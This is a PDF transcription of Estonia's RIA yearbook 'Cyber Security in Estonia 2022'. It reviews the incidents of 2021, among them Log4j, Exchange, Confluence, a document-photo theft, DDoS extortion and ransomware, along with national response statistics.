Cyber Security in Estonia 2022
←
→
Page content transcription
If your browser does not render page correctly, please read the page content below
Contents 6 Learning From Security Vulnerabilities Makes Us Stronger Last year will go down in history as the year of security vulnerabilities, where in the race against time and criminals, we had to learn some painful lessons. However, all experi- ences are useful and must be shared, says Gert Auväärt, Director of the Cyber Security Branch of the Informa- tion System Authority (RIA). 8 The Situation in Cyberspace: A Year of Security Vulnerabilities 2021 will go down in the history of 20 cybersecurity as a year of major Log4j Caused an IT Earthquake security vulnerabilities. The largest of In December, IT professionals had to these was the vulnerability identified respond to one of the biggest security in the Log4j logging application, but vulnerabilities in recent years: there were also those that only the Log4j zero day vulnerability. affected the Estonian e-state. The IT community witnessed a severe earthquake all over the world at the 14 How Did a Hacker Steal same time and started preparing for 300,000 Document Photos? a devastating tsunami. One of the most serious incidents last 22 year was due to a security vulnerability In 2021, There Were 50% in the service of RIA. The attacker More Denial-Of-Service downloaded nearly 300,000 document Attacks Than Last Year photos, but was caught a few days Last year, we registered 47 impactful after the data theft was discovered. denial-of-service attacks, which is twice as many as in 2020. Until the 16 Legacy Brought Bad Surprises spring, ransom denial-of-service The access rights system of the state attacks targeted companies, but in portal eesti.ee was a painful reminder the autumn, schools and learning that if the attitude towards data environments became the victims. protection changes, so must the 24 information system. Financial Fraud Has Become More Diverse 18 Patching Vulnerabilities Is Last year, we received 20% more Still a Problem reports of fraud than the year before People tend to put off until tomorrow about incidents in which Estonian what they can do today. Last year, we people and companies lost money. saw all too often what happens when RIA only sees the tip of the iceberg, this principle is followed when fixing because victims of financial fraud critical vulnerabilities. turn primarily to the police. 4 Cyber Security in Estonia 2022
28 Cannot Get Through the Gate Until the Gate is Open Most of us follow simple principles to ensure our physical security, but many seem to think that digital assets are able to protect themselves, writes Oskar Gross, Head of the Cybercrime Unit of the Central Criminal Police. 30 Ransomware Attacks Rarely Have a Happy Ending While heroes in Hollywood hostage films are usually able to escape, then in hostage-taking in cyberspace, where criminals gain access to corporate or personal information, the victim often has to choose 36 between bad and very bad options. What Happened in International Cyberspace in 2021? 32 What Did We Learn From Last year, news of cyber incidents the Local Elections? and security reached even those who Some functional errors caused public had not heard of these topics before. disapproval, but we did not identify Many incidents directly and severely any malicious activity that could have disrupted the daily lives of people and impacted the 2021 local elections. crossed the news threshold. 34 40 Hackers, Help the State! Potential Disasters Avoided We are working on a model that would When it comes to cybersecurity, allow state agencies to work with the focus is often on high-impact hackers and pay them for information incidents and the damage they cause: about security vulnerabilities. be it stolen data, encrypted systems, or lost money. However, there are also incidents with a happy ending. 42 The Cyber Hygiene of the Estonian Population is Improving The level of the cyber hygiene of the Estonian population has improved in three years, but there is room for improvement, according to data collected in cooperation with Statistics Estonia. 44 What Will 2022 Bring in Cyberspace? Last year brought a lot of security vulnerabilities and a ransomware epidemic. What’s in store this year? Cyber Security in Estonia 2022 5
● FOREWORD Learning From Security Vulnerabilities Makes Us Stronger Last year will go down in history as the year of security vulnerabilities, where in the race against time and criminals, we had to learn some painful lessons. However, all experiences are useful and must be shared, says Gert Auväärt, Director of the Cyber Security Branch of the Information System Authority (RIA). M y time in RIA started with big vices and have not been renewed. We have challenges. In July, two critical carried out an internal analysis of these cases weaknesses were identified in our and streamlined the processes within RIA to own systems that allowed access avoid incidents like this in the future. to users’ personal data. In essence, you could In both cases, we received the first indica- say that even though the door was locked, the tion that something may be wrong from peo- key had been left nearby. ple outside of our organisation. This illus- A month later, we found out about possible trates that the state alone may not be able to vulnerabilities in other national e-services, as a find the weaknesses of a 20-year-old e-state result of which some personal data was not and that security can be created in partner- appropriately protected. Vulnerabilities in the ship with the community. It is very important real estate and marital property register were that we all take security vulnerabilities seri- patched and according to our current knowl- ously and patch them. We must share infor- edge, the data had not been misused in any way. mation because it allows us to learn from oth- ers and we must not ignore tips and SECURITY COMES FROM COOPERATION suggestions. The consequences of the vulnera- Both incidents with our services, the data leak bilities depend on the speed with which we act of access rights in the self-service environ- – whether we are able to patch them before ment of eesti.ee for entrepreneurs and the ille- criminals manage to exploit them. gal download of document photos (both cases will be discussed in more detail in this year- WARNINGS ARE NOT TAKEN SERIOUSLY book) happened partly due to the fact that old In March last year, when Microsoft disclosed system interfaces are still present in some ser- its Exchange server vulnerability and provid- 6 Cyber Security in Estonia 2022
ters more than 20,000 notifications and near- ly 2,500 cyber incidents a year that have a real impact on the system or how it works. Although most attempts to attack fail, we must stay vigilant. FOR A SAFER ESTONIA Ransomware attacks, which are becoming more and more popular in the world, cause losses to entrepreneurs that are comparable to the budget of an average Estonian state agency. Estonia has not yet been successfully targeted with high-impact ransomware attacks, but it is only a matter of time as our daily lives, including the functioning of the country, depend on digital services. Although the security of the systems is the responsibility of their owner, we must all play our part. Just as the state must protect its peo- ple who have entrusted their data to it, so must any other owner of a database or service. GERT AUVÄÄRT The digital society is based on trust. director of the Cyber Security Branch of RIA In order to protect the reliability and securi- ty of our e-state, we have also increased our capabilities in RIA, both in terms of people as ed information on how to patch it, we notified well as our tools and infrastructure. We put our partners and other authorities. However, together a team of testers, developed a bug a week later our monitoring revealed that two- bounty programme to detect and patch ser- thirds of those informed had not yet taken the vice vulnerabilities, and increased the security necessary action. The e-mail servers of these of the state network. organisations were still vulnerable, meaning In order to create and maintain security, we that the mailboxes of the employees were have taken another important step in RIA: the essentially unprotected. The warning had not Estonian Information Security Standard been taken seriously. (E-ITS) is finally ready. This is the most Unpatched systems usually result in crimi- important guide for companies to prevent nals finding them and compromising them – potential risks. At the end of 2021, the first installing malware, stealing data, etc. Cyber- pilot group started its work, the main role of crime is one of the most lucrative and thus the which is to develop best practices in the imple- fastest growing types of crime in the world. mentation of the standard and to prepare new However, catching those criminals is difficult, E-ITS experience consultants. Together with as it is easier to hide traces in cyberspace and the University of Tartu, the initial E-ITS- the consequences of crime can appear after based maturity model was completed, which several years. gives organisations a quick assessment of IT systems around the world are being their information security situation and allows attacked all the time, and the security vulner- authorities to compare the level of informa- abilities that have been discovered and made tion security. public can be of great benefit to those who are That is how we are building a safer Estonia trying to get rich or gain influence. RIA regis- step by step. ● Cyber Security in Estonia 2022 7
The Situation in Cyberspace: A Year of Security Vulnerabilities 2021 will go down in the history of cybersecurity as a year of major security vulnerabilities. The largest of these was the vulnerability identified in the Log4j logging application, but there were also those that only affected the Estonian e-state. 8 Cyber Security in Estonia 2022
T here are security vulnerabilities in almost every system and in every code – you just have to search for them. Serious security Most of them are identified and vulnerabilities have addressed quickly. It is a common practice in information security communities that the per- impacted the society son who discovers a security vulnerability noti- before, but in 2021, fies the owner of the system or service first. They give enough time to develop security there seemed to be patches or code updates, and only then reveal no end to them. the vulnerability to the rest of the world. This was not the case with the major security vulnerabilities discovered in 2021. Serious Although the vulnerability only gave the attack- security vulnerabilities have impacted the soci- er access to document photos – with which one ety before, but in 2021, there seemed to be no can do almost nothing in the age of digital docu- end to them. ments – it raised legitimate concerns about whether the Estonian e-state can keep data secure IF YOU DO NOT KNOW YET and protect it from thieves. However, the course THAT YOU ARE VULNERABLE of the incident proved that the principle of data In 2021, the Estonian society was probably most separation we use in our e-state is correct. Every affected by the news that an attacker found a query for a document photo left a trace, which security vulnerability in the system managed by allowed the police to detain the attacker and he the Information System Authority (RIA) and was not able to obtain any other data. obtained document photos of hundreds of thou- By security vulnerabilities, we also mean sands of people (you can read more about this configuration errors. One of these was discov- attack on page 14). ered by an observant citizen in the self-service ❱ Cyber Security in Estonia 2022 9
73,826 Incidents and notifications in 2021 60,000 55,635 50,000 40,000 30,000 24,369 20,000 22,896 20,077 17,440 15,730 14,332 10,000 10,649 3,139 3,473 3,164 2,722 2,237 0 2017 2018 2019 2020 2021 ● Number of reports ● Incidents with an impact ● Automated infection notifications ● Automated security vulnerability notifications environment of eesti.ee for entrepreneurs, Social Affairs, and the Ministry of Foreign Affairs where the first and last names, personal identi- were attacked, and we saw attacks with similar fication codes, places of work, and, in some cas- handwriting also in 2021. What is common for es, connections with previous positions of more all of them is that the attacker scanned web serv- than 300,000 people related to legal entities ers with publicly available tools, found security were visible. The system was originally designed vulnerabilities, uploaded malicious code, and so that authorised persons could see the data of thus gained unauthorised access to the servers. other authorised persons and it had not been In February, we were informed that a compa- updated over the years. We are extremely grate- ny which provides cloud services and software to ful that the case was reported to us: we were many public sector authorities (ministries and able to fix the bug before the general public or a local governments) and another company which malicious attacker had the opportunity to view provides remote access services to public sector or misuse third-party data. authorities had been compromised. Both of A security vulnerability that is so new that them handled the incidents professionally: they only an attacker knows about it and the owner fixed their services, informed customers, and of the service has not even had a day to fix it is worked in full cooperation with CERT-EE. called a zero-day vulnerability. However, if an update to a vulnerable service already exists, it IF THE WHOLE WORLD KNOWS is a whole other story. Unfortunately, owners of YOU ARE VULNERABLE larger networks and e-services often do not The public will only hear about the consequenc- have a detailed overview of all their online ser- es of some security vulnerabilities much later, vices and their vulnerabilities. The owners as their effects may become apparent in a mat- should look at their IT infrastructure through ter of months. In March, Microsoft disclosed the eyes of an attacker, as they are constantly four zero-day vulnerabilities in its mail server looking for security flaws. software that allowed attackers extensive access At the end of 2020, the Ministry of Economic to the entire server, including e-mails and pass- Affairs and Communications, the Ministry of words. According to Microsoft, the attackers 10 Cyber Security in Estonia 2022
quickly built tools that began searching the entire world for vulnerable Exchange servers that had not been updated and once they found them, the servers were compromised and infected with malware. Log4j vulnerability – At the end of August, Atlassian announced what is it? that their world-wide wiki platform Confluence The critical security vulnerability Log4Shell also had a critical security vulnerability that was identified in the Log4j function of the Java required a software update. Confluence is com- programming language used in billions of monly used for business process documenta- devices and software products around the tion or internal web sites. By early September, world. The severity of the security vulnerability attackers had already been able to exploit the is rated the highest possible by the international vulnerability and use automated systems to CVE standard (10 out of 10 points), potentially gain access to Confluence servers exposed to allowing an attacker to run their code freely on Internet around the world, including in Estonia a vulnerable device. (see page 18 for more information). An attacker could exploit the vulnerability The security vulnerability with the greatest by sending a command in a specific format to a impact was only revealed at the end of the year, vulnerable server, device, or system (beginning when players on the popular Minecraft gaming with ‘$ {jndi:’) and adding a reference to platform began experimenting with a newly malware that may be located on a third-party discovered security vulnerability that allowed server. The vulnerable server logs the com- them to send commands to the game server. mand, Log4j searches for the uploaded The critical security vulnerability Log4Shell malware, downloads it, and runs it. Depending identified in the Log4j logging function of the on the nature of the malware, it may give a Java programming language, which is used in third party access to the device. billions of devices and software products around the world, had already been patched by software, web services, and more. This was also the case in Estonia, as many Estonian e-servic- es use the hugely popular Java programming The owners should look language as well as the Log4j function. at their IT infrastructure The general public may not have noticed this, but the combined effort of the global IT com- through the eyes of munity to identify the extent of the vulnerabili- an attacker, as they are ty and to support each other was impressive. IT professionals did not mind national borders, constantly looking for open-source or commercial services and occa- security flaws. sionally they even forgot their sleep and loved ones. However, we will most likely see the full impact of the Log4j vulnerability only later, the manufacturer, but these same devices and when it becomes clear how much the attackers the software used in them had not been updat- managed to exploit the vulnerability before it ed yet. was patched. As news of the vulnerability spread, IT pro- fessionals, developers, and security profession- IT ALL STARTS WITH ACCESS: als around the world rushed to update the Log4j RANSOMWARE AND OTHER INCIDENTS function in their own software and then wait for Ransomware attacks received a lot of attention software updates for all their other products — around the world this year – and for good rea- industrial devices, network devices, antivirus son. The attack on Colonial Pipeline, a U.S. fuel ❱ Cyber Security in Estonia 2022 11
Other 178 Phishing Incidents with an 775 impact in 2021 Malware 79 ● Denial-of-service attack 47 Botnet ● Data leak 43 98 ● SEO spam 34 ALTOGETHER 2,237 ● Ransomware 30 Fraud 99 Compromised accounts INCIDENTS 168 supplier, made headlines, halting fuel Account supplies to the U.S. East Coast, but multi- takeover Malicious redirect milliondollar ransom demands and 170 262 Service encrypted IT systems caused widespread interruption problems in many countries. 254 The most expensive ransomware attacks usually target companies operating in the Unit- ed States or in the wider English-speaking busi- On many occasions, CERT-EE specialists ness environment. In Estonia, ransomware have been able to help recover data that is incidents involve smaller enterprises, and the encrypted with ransomware without the vic- demands are usually in the range from a few tims having to pay the ransom. Sometimes, thousand euros to tens of thousands of euros. ransomware has left much of the data available We were informed of a total of 30 ransomware (for example, it encrypts only the beginning or incidents in 2021 (33 in 2020). It seems that the end of the files); other times, decryptors can the small size of Estonia and our language envi- be found to recover the data. In case of a ran- ronment works in our favour, as does the stead- somware incident, we encourage companies to ily improving cyber hygiene. contact CERT-EE and to always keep in mind Cyber hygiene and compliance with stand- that paying the ransom only motivates the ards are relatively effective against ransomware criminals to launch further attacks. attacks. In 2021, attackers accessed the systems of their victims mostly through a remote desk- WHAT HAPPENED top application (Remote Desktop Protocol or TO THE YEAR OF PHISHING? RDP in Windows). Some versions have publicly We called 2020 the year of phishing in the last known security vulnerabilities, and in some yearbook – the number of phishing sites had cases, passwords that are still in use can be increased by a fifth, and phishing was often a found in leaked password databases. means by which attackers could learn the pass- IT companies providing services to third par- words of an employee of an organisation. ties should pay special attention to the preven- Phishing attacks continued in 2021. The tion of potential ransomware attacks. In April, number of phishing site incidents increased we learned of a case where a ransomware attack both in percentage (35% of all incidents with an targeted an IT service company, through which impact compared to 26% a year earlier) and in it spread to four more companies. In May, there overall numbers (755 in 2021 and 711 in 2020, was an attempt to launch a ransomware attack respectively). These figures reflect how many against a local government which had been times phishing sites have been taken down at accessed through an accounting service provid- the request of CERT-EE specialists; the num- er that had been compromised. bers of notifications are much higher. 12 Cyber Security in Estonia 2022
Similarly to the year before, the sites can be September, we have seen continuous short-term broadly divided into two: bank account phish- attacks on general education schools, vocational ing and account credentials phishing. The training institutions, universities, as well as the phishing sites are usually almost identical with e-learning environments managed by the Edu- the originals, but the address is different. In the cation and Youth Board. case of bank account phishing, the victim The attacks are often ordered by schoolchil- unknowingly sends money to the wrong dren from relatively accessible online forums. In account, and the passwords entered on the such places, DDoS attacks are offered as a ser- account credentials phishing sites are most vice: an attacker has amassed a large number of often used to break into e-mail accounts. As a routers and other IoT devices with security vul- rule, using multi-factor authentication helps to nerabilities or poor configuration on the botnet protect your account even if you have acciden- and is using it to launch DDoS attacks for a small tally entered your password on a phishing site. sum of money. Bank account phishing attacks that have tar- However, these attacks affect not only the geted Estonians for several years are already infrastructure of that school, but also other familiar to us. It seems more profitable for the authorities that use the same name servers, for criminals to call victims and persuade them to example. send money. In terms of account details, how- ever, it does not look like the phishing attacks will cease any time soon. It seems that the small BOTNETS ENABLE NEW size of Estonia and our DENIAL-OF-SERVICE ATTACKS The unpleasant surprise of 2021 was the high language environment impact of distributed denial-of-service (DDoS) works in our favour, attacks. The overall figures also show an increase: compared to 2020, the number of as does the steadily major DDoS attacks increased from 32 to 47 improving cyber hygiene. (these are the attacks that were reported to CERT-EE). We have also gained better visibility of smaller DDoS attacks since the summer of In one of the denial-of-service attacks in May, 2020, which also shows a clear upward trend. we identified a router with a security vulnerabil- In 2021, we saw several waves of DDoS attacks ity in Estonia that was connected to a botnet and with a significant impact. In January and Febru- participated in an attack on a vocational educa- ary, several banks and technology companies tional institution. We informed the owner of the operating in Estonia received DDoS attacks router, and at least this device can no longer be accompanied by extortion letters. Similar attacks used for a DDoS attack. Read more about deni- had been carried out on the same companies al-of-service attacks on page 22. three months earlier, and the threatening letters This incident also shows that security vulner- referred to previous attacks, saying ‘we have not abilities, out-of-date software, and configura- received your payment’, ‘we are back now, pay tion errors enable attacks that have a major off’, and ‘if you do not pay us now, we will be impact on our daily lives. Therefore, it is back soon’. Similar attacks took place in other extremely important for device and system European countries (at least in five Member owners to pay full attention to security patches States according to CERT-EU) and beyond. and security vulnerability notifications (includ- We also saw the first attack on a school in Tal- ing the daily notifications of CERT-EE). This linn in January, which briefly disrupted the work way, you can trust that your router, smart TV, of educational institutions throughout the city. or fridge does not give attackers a chance to dis- This became a trend in spring and autumn. Since rupt Estonian life. ● Cyber Security in Estonia 2022 13
How Did a Hacker Steal 300,000 Document Photos? One of the most serious incidents last year was due to a security vulnerability in the service of the Information System Authority (RIA). The attacker downloaded nearly 300,000 document photos, but was caught a few days after the data theft was discovered. O n 21 July, CERT-EE detected that service) that is used when a person wants to 286,438 document photos had been download their document photo. illegally downloaded from the data- You can download your document photo base of identity documents. They either directly from the state portal or through had been downloaded en masse from 9,000 the DigiDoc application. In both cases, the per- Estonian and foreign IP addresses since 12 son must first authenticate themselves. Once July. This was caused by a security vulnerability the request has been made, the system requests in the photo transfer service (so-called photo the photo from the service that mediates it, the so-called photo service, which is managed by RIA. The photo service requests the photo over Lessons from the the X-tee from the database of identity docu- ments, which belongs to the Police and Border photo theft Guard Board, and sends it back to the person. RIA analysed and improved its workflows to Upon detection of the attack, RIA temporarily prevent future incidents caused by such security closed this function for DigiDoc. vulnerabilities. In addition, the case inspired us to create a national bug bounty programme to HOW WAS THE ATTACKER motivate good hackers. This means that in the ABLE TO DOWNLOAD THE PHOTOS? future, hackers who have discovered security DigiDoc makes requests over a public URL. By vulnerabilities in state systems may receive a manipulating this, the attacker managed to give reward from the state. However, the reward is the photo service the impression that the only paid if the hacker follows the established request comes from an authenticated user who rules and conditions. The rewards programme wants to download their document photo. is currently being worked on. However, behind the request was an attacker 14 Cyber Security in Estonia 2022
DIGIDOC PIN1 + certificate eesti.ee verification State authentication ATTACKER service Identification SECURITY ! PHOTO SERVICE VULBERABILITY Database of identity documents Secure communication A fake certificate is sent to the photo service. The service does not fully verify the validity of the certificate and sends a document photo. ! over the X-tee who turned directly to the photo service using CERT-EE analysed logs starting from 30 forged or self-created certificates (see figure). June 2018 and found no other anomalies. This To create a fake certificate, the attacker had to leads to the conclusion that the security vulner- have the personal identification code and name ability of the photo transfer service had not of the person. been abused before (i.e. before July 2021). The photo service should have recognised that The police detained the suspect a few days the certificates used by the attacker were not after the incident was discovered and confiscat- issued by SK ID Solutions – that they were ed the downloaded data. Preliminary informa- forged. Although the attacker had marked SK ID tion suggested that the photos were simply Solutions as the issuer of the fake certificates, stored on the computer of the attacker. The ‘looking in’ them would have shown that they proceedings conducted by the Office of the actually came from elsewhere. Due to the securi- Prosecutor General are still ongoing. ty vulnerability, the service did not do this. As a result of the attack, the criminal did not have access to the database of identity docu- The police detained the ments, but managed to download document pho- tos from it. A few days after the discovery, the suspect a few days after security vulnerability was patched and RIA reo- the incident was discovered pened the photo service for DigiDoc so that peo- ple could download their document photos again. and confiscated the downloaded data. WHAT CAUSED THIS SECURITY VULNERABILITY? Reportedly, the security vulnerability in the It is not common for attackers behind cyber photo transfer service occurred in November incidents to be caught so quickly. They are often 2018. The interruption of the service was prob- located abroad and their traces are difficult – if ably related to the exchange of ID-card certifi- not impossible – to detect. In this case, we cates – changes were made in the information managed to do so thanks to quick and efficient systems to support authentication with new cooperation between the police, CERT-EE, and certificates. the Prosecutor’s Office. ● Cyber Security in Estonia 2022 15
Legacy Brought Bad Surprises Last summer, we got a painful reminder that if the attitude towards data protection changes, so must the information system. O n 6 July, an entrepreneur informed data of others when, for example, they searched us that on the website for entrepre- for ‘Paul’ – in which case they were shown all neurs on the state portal eesti.ee, a the people called Paul in the database. database with 336,733 data rows is It was not a classic cyber incident – the sys- available to users authenticated in the self-ser- tem was not attacked or broken. However, that vice environment of the access rights manage- information should not have been visible in ment system (AAR). The first and last names, that way. So what happened? personal identification codes, places of work, and, in some cases, connections with previous THE SYSTEM BECAME OUTDATED positions and roles (e.g. job title, start and end The entire administration system for access date of employment) of people were visible. The rights – including its self-service environment database contained persons from both the pub- on the state portal – was designed and built so lic and private sectors. that all data is visible to all people in the data- This data was visible to the people appointed base. The world around this system has to represent the authority or company, i.e. to all changed, especially the approach to data pro- those for whom there was a row in the same tection. Thus, the structure of the system database. All data rows became visible when became inappropriate. somebody performed a so-called empty or It was clear we had to change it. In July, the parameterless search. The person also saw the Information System Authority (RIA) closed the self-service environment of the access rights system on the state portal. Now, the RIA help- desk must be contacted at help@ria.ee to What is the AAR? change roles and grant accesses. Before, cus- The AAR, or administration system for access tomers themselves could provide access quickly rights, is a system for authorised persons of an and directly. Now, however, it has become a lit- authority or a company in which they can tle more inconvenient. It takes more time and provide others access to various services. effort to create an authorisation, digitally sign For example, the head of a company can grant it, send it to RIA, and receive a response. rights to an accountant to transfer employee We did not consider it appropriate to con- data to the employment register maintained tribute to the thorough development of the old by the Tax and Customs Board. system to reopen the self-service environment 16 Cyber Security in Estonia 2022
The state is contributing to the solution of the problem with legacy systems An additional 14.4 million euros was allocated from the state budget in 2022 for the updating and maintenance of outdated information systems and platforms. In addition, the govern- ment allocated 500,000 euros from the reserve fund for additional investments for the rapid updating and, if necessary, closure of the outdated information systems of the state c y portal eesti.ee. a g le Outdated systems are used in both the public and private sectors. This is understandable in many ways – replacing the legacy is costly and time-consuming and can also lead to a change in the usual functionalities. So what can you do? The first step could be to get to know the there. One important argument was that RIA is legacy systems of your organisation. This gives already developing a new administration sys- you an idea of the state of the system, what fea- tem for access rights, Pääsuke. Another impor- tures it offers, as well as its vulnerabilities and tant argument was that changing old systems, crossdependencies. or so-called legacy systems, may not be as easy as one might think. A WIDER PROBLEM So what can you do? Legacy is a system, technology, or software that is still running but is actually outdated and becom- The first step could ing more and more vulnerable over time. Legacy is a problem in many long-established companies be to get to know and authorities. For example, the current owners the legacy systems of a system developed 10 years ago may not have a full understanding of its structure and func- of your organisation. tions. Organisations change over time, people are replaced, and often, the solutions put in place are not properly documented for the new employees. This is exactly what RIA has done. We have Therefore, it is often not known exactly what become even more familiar with our legacy and effect an upgrade of one part may have on anoth- set up processes so that our systems are updat- er part of the system. ed at all times.● Cyber Security in Estonia 2022 17
Patching Vulnerabilities Is Still a Problem People tend to put off until tomorrow what they can do today. Last year, we saw all too often what happens when this principle is followed when fixing critical vulnerabilities. . O n 2 March 2021, Microsoft announ- the start of the race against time – between the ced that the popular e-mail server attackers who used automated tools to search software Exchange Server had four for and attack vulnerable mail servers and the zero-day vulnerabilities that could server owners and administrators who now had allow an attacker to install malware on the serv- the means to patch the ability. er of the victim and gain access to their e-mail, contacts, passwords, and administrator privi- THE MAÑANA ATTITUDE leges. In the same announcement, Microsoft DOES NOT HELP also released security patches and asked users In many cases, the attackers won. On 3 March, to install them as soon as possible. Microsoft announced that there were ‘a limited Until that point, few people knew about the number of victims’. On 8 March, however, there vulnerabilities (according to Microsoft, they were more than 60,000. The day after the vul- were used for attacks by the Chinese cyber nerabilities were disclosed, CERT-EE identified group HAFNIUM), but from 2 March, the infor- more than 80 mail servers with the mentioned mation was available to everyone. This marked vulnerabilities in the Estonian cyberspace. We informed their owners and administrators, as well as public sector security managers and vital and important service providers. When we Speed matters repeated the monitoring on 10 March, we There is nothing new about critical security unfortunately discovered that two-thirds of vulnerabilities in software, but the pace at these servers were still using unpatched soft- which cyber groups and individual criminals ware and were therefore vulnerable to attacks. detect and compromise unpatched systems is While three-quarters of the vulnerable servers unprecedented. It used to take weeks, but now, were patched worldwide in a week, only a third it only takes days or hours. Those responsible were patched in Estonia. for cyber security must keep pace and patch Therefore, we were not surprised by reports dangerous security vulnerabilities as soon of compromised mail servers. The criminals as possible, rather than postponing them. managed to attack local governments and pri- 18 Cyber Security in Estonia 2022
Record number vate companies, as well as the medical sector and educational institutions. of vulnerabilities - The National Vulnerability Database (NVD) DIFFERENT SOFTWARE, THE SAME SCHEME of the US National Institute of Standards A similar sequence unfolded in late August and and Technology (NIST) recorded 20,046 early September. On 25 August, Atlassian, the vulnerabilities in 2021 (18,351 in 2020, maker of the wiki platform, announced that 17,382 in 2019, and 17,252 in 2018). their Confluence software contained a critical - Attackers did not need good technical vulnerability that could allow remote code exe- skills to take advantage of 90 per cent of cution. The security vulnerability allowed an these vulnerabilities. unauthenticated user to compromise the Con- - For 61 per cent of the vulnerabilities, carrying fluence server of an enterprise or authority and out an attack did not require any action edit, add, delete, and/or copy data there. In on the part of the victim: clicking on a link, addition, it allowed malicious code to be sharing passwords, launching software, installed on the systems of the victim to mine or the like. cryptocurrency or create a backdoor to carry out new attacks. Atlassian rated the threat severity of these vulnerabilities with 9.8 on a ten-point scale. Confluence is not as common as Microsoft Exchange, but it is also used by many Estonian state agencies and private companies as an intranet platform. In September, we learned that three state agencies had been attacked through this security vulnerability. Early detection of the attackers allowed the agencies to avoid major damage, but these attacks would have been preventable if the software had been updated in time. ● The criminals managed to attack local governments and private companies, as well as the medical sector and educational institutions. Cyber Security in Estonia 2022 19
Log4j Caused an IT Earthquake On 9 December, IT professionals had to respond to one of the biggest security vulnerabilities in recent years: the Log4j zero day vulnerability. The IT community witnessed a severe earthquake all over the world at the same time and started preparing for a devastating tsunami. J ava is one of the most widely used soft- sidewalks and crosswalks or crossing the streets ware development platforms. Its open in wrong places. If there is an accident in the source logging framework Log4j is very area, the police can find out the circumstances common – billions of computers use it to of the accident by looking at the recording. This keep apps and services running. The function is is essentially how logging works. used by Apple, Steam, Twitter, Amazon, Tesla, However, if a vulnerability of the camera IBM, Minecraft, LinkedIn, and thousands of allows the information systems and databases other well-known and lesser-known companies. of the city government to be taken over, the sit- uation is equivalent to the critical vulnerability WHAT IS THE LOG4J FUNCTION? of Log4j, which gives criminals power not only Each software logs or stores data in one way or over this particular function (camera) but the another to have an overview of what is going on entire infrastructure. with the software. This is necessary for three reasons: to keep the software running, for HOW IS THE SECURITY development, and for ensuring security. Log- VULNERABILITY EXPLOITED? ging or storing data is essential. Although a tsunami was expected after the Logging can be compared to a smart camera weakness became apparent and people started on the main street and square in a city. It gives getting ready to board Noah’s Ark, the end of the city authorities the opportunity to check the IT world has not yet come. The impact of whether the Christmas tree is still standing, the vulnerability may not become apparent for whether the streets are covered in snow, or years to come. At this time, we do not know if whether city services are working as they and where the attackers intruded before the should. In addition, it helps to analyse how peo- security updates were installed. ple behave there: whether they use the existing Attackers could exploit the vulnerability by 20 Cyber Security in Estonia 2022
sending a message in a specific format and an What did RIA do? additional reference to malware located some- where on the third server to a vulnerable server, - On 10 December, we informed the Estonian device, or system that could be accessed from public about the security vulnerability and the Internet. The vulnerable server read the its impact. command from the message, Log4j searched - On 13 and 19 December, we sent additional for the malware, downloaded it, and ran it. It information about the security vulnerability was as if a person were knocking themselves to the public sector and vital service out. Depending on the nature of the malware, it providers. may give a third party access to the device. - On 22 December, we published a post on The security vulnerability primarily affects the RIA blog focusing on the security companies and authorities, as it is potentially vulnerability. possible to gain access to their systems. Once a - We identified RIA services that are affected it is exploited by criminals and they are able to by the vulnerability. We installed updates install malware on popular services, it will also or countermeasures. affect end users. - CERT-EE monitors what is happening in As at the end of 2021, there has been no mass Estonian cyberspace 24/7 and searches exploitation of the Log4j vulnerability in Esto- for attack attempts. nia or in the world, but as we wrote, its impact could still be revealed. Criminals are currently actively monitoring online services to find sys- SITUATION IN ESTONIA tems that have not been addressed. Vulnerable In the days following the disclosure of the secu- devices are also being searched for in Estonia. rity vulnerability, CERT-EE identified Estonian companies and authorities that were at risk due WHAT SHOULD I DO? to the vulnerability and asked to update or close First, inspect services built on the Java plat- the respective services. CERT-EE will continue form that are part of your service portfolio. to look for new cases, as not all service users Check for updates to the products you use. If have yet patched the vulnerability. In addition, there are updates, install them as soon as possi- there is not a security patch for all services yet. ble because they address a critical security RIA has not received reports of attacks with vulnerability. This is especially important for serious consequences resulting from the Log4j systems that are available online. vulnerability. However, malware has been However, this does not mean you are safe. On installed in Estonia on computers through the 28 December, a smaller vulnerability was dis- vulnerability, which mines cryptocurrency. covered in the next version of Log4j. IT profes- Because this malware slows down services, sionals need to keep a close eye on what is going these cryptocurrency miners are quickly found on with this vulnerability and be prepared that and removed. the update needs to be updated as well. It should There have been reports abroad that attempts also be borne in mind that a security patch has have been made to prepare for ransomware not yet been developed for all services. The vul- attacks through the vulnerability. If criminals nerability may never materialise if the vulnera- have launched malware on a system that is dif- ble service is not open to the Internet or devices ficult to detect right away, data leaks can occur are prevented from accessing the Internet. much later. ● First, inspect services built on the Java platform that are part of your service portfolio. Cyber Security in Estonia 2022 21
In 2021, There Were 50% More DDoS Attacks Than Last Year Last year, we registered 47 distributed denial-of-service attacks (DDoS), which is 50% more than last year as in 2020. Until the spring, ransom denial-or-service attacks targeted companies, but in the autumn, schools and learning environments became the victims. O ne cold afternoon in February, a Usually, the victim is given more time to threatening e-mail was sent to a react. This time, however, the attack started ten commercial bank operating in Esto- minutes later. At one point, neither Internet nia. Transfer two Bitcoins (worth banking, card payments, nor the internal ser- nearly 56,000 euros at the time) to the account vices of the bank were available. Although the specified on the e-mail, or we will launch a mas- attack lasted with varying intensity until the sive denial-of-service attack against your busi- evening of the same day, and its effects were felt ness. The bank had received a similar e-mail by both the customers and employees of the and undergone a so-called sample attack four bank, the protection measures helped to pre- months prior. vent the worst. RANSOM DDOS ATTACKS ENDED Such ransom denial-or-service attacks returned To prevent safe-looking to Estonian cyberspace in the autumn of 2020 and continued in the beginning of 2021. The tar- devices from becoming gets were a number of companies in the techno- logy and financial sectors that have a lot to lose a dangerous tool in the from the disruption of e-services, but which also hands of cybercriminals, have above-average levels of cyber security. The victims who were attacked in the autumn always make sure to were attacked again a few months later. The attacks were mostly based on intimidation, but update their software. there were exceptions. For example, a blackmai- ler who organised a denial-of-service attack wro- 22 Cyber Security in Estonia 2022
